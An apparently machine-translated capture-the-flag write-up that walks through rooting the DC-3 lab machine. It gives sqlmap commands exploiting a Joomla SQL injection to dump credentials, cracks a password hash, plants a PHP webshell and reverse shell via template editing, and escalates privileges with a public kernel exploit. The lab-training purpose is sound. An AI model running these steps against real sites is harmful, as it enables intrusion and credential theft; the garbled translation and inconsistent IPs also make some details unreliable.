Two verbose sentences: The process before the rights escalation was completed a month ago. At that time, there was a problem with the rights escalation and it was shelved. It was only completed today, so the IP address may have changed. Note: The IP address that appears later is 192.168.200.55, which is also the target IP address. If this article can be of help to you, I would be honored.
1. Set up the environment
1. Tools
Attack aircraft: kali (192.168.200.14)
Target drone: DC-3 (unknown)
2.Attention
The network connection method of the attack aircraft and the target aircraft must be the same. In addition, the network connection method of DC-1 is the NAT mode, which is the same as the network connection mode of kali (of course, the bridge mode can also be selected)
DC-1 Network Design
After clicking Advanced, you can view the MAC address of the DC-1 target machine to facilitate identification when scanning IP.
2. Information collection
1. Scan the surviving hosts in the same network segment
The MAC address of the target drone dc-3, determine the IP address based on the MAC address
One:
arp-scan -l
Second:
nmap -sP 192.168.200.0/24 -T4
Third:
natdiscover
2. Scan target IP open ports
nmap -sV -p- 192.168.200.8 #-sV scans software information running on the target host port #-p- Scan all ports 0-65535
You can see this site, only port 80 is open
3. Scan the background directory
Using the dirsearch tool, you can see the administrator directory, which should be the background
4. Fingerprint collection
Login to the website
A famous CMS system
The English translation on the left is:
This time, there is only one flag, one entry point, and no clues. To get this flag you obviously have to gain root privileges (elevated privileges). How you become a root is up to you – and, obviously, the system. Good luck and I hope you enjoy this little challenge.
Scan using joomscan
joomscan -u http://192.168.200.8/
joomscan installation method
sudo apt-get install joomscan
General: You can go to Baidu to search for vulnerabilities related to it according to the framework version, first log in to the backend directory
After searching on Baidu, you can find the same SQL vulnerabilities
Use the KILI tool to find vulnerabilities
View Files,
5.Background blast
sqlmap lists database library names
sqlmap -u “http://192.168.200.8/index.php ?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent –dbs -p list[fullordering]
Payload built based on the provided SQLmap
sqlmap lists all table names under the database joomladb
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent -D “joomladb” –tables -p list[fullordering]
Found #_users table
List the field types of the users table
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent -D “joomladb” -T “#__users” –columns -p list[fullordering]
Information in #__users
Determine the account name. The account password is generally “username,password”
Explosive data
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username –dump
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #Hash encryption
Use the join tool in kali to decrypt
vi admin.txt #Edit Write the ciphertext john admin.txt #Crack
After cracking, the login password is: snoopy Account: admin
Log in to the background
3. Vulnerability detection
Upload Webshell
The source code of the website can be found, and the php file in the template can be edited.
Joomla backend editable template, use this function to create a test.php under the template, write a sentence, Ant Sword is successfully connected
The path to upload the one-sentence Trojan was as follows. At this time, you can browse the website directory and open a virtual terminal.
The template asks for the path (directly accessing the current folder can obtain the contents of the current folder)
http://192.168.200.8/templates/beez3/html/
Rebound shell
Upload a rebound shell file in the /templates/beez3 template. Remember the upload path. The file is created by yourself. The file name of this article is shell.php.
Rebound shell successful
Use EXP
Use the searchsploit tool to search for privilege escalation in Ubuntu 16.04 and find a “denial of service vulnerability” that can be used to escalate privileges
searchsploit ubuntu 16.04
View vulnerabilities and download EXP
cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt cat shelll.txt
The file content provides the EXP URL
Download (this step is implemented in the target machine, this step is performed incorrectly)
unzip files
unzip 39772.zip #Unzip the 29772.zip file cd 39772 tar -xvf exploit.tar #Unzip the exploit privilege escalation script tar package cd ebpf_mapfd_doubleput_exploit
Elevation of privilege
Compile code
./compile.sh #Execute the script and compile the file
Elevate privileges and obtain root privileges
./doubleput #Execute privilege escalation file
wait a little while
Article reference: https://blog.csdn.net/weixin_43583637/article/details/101554815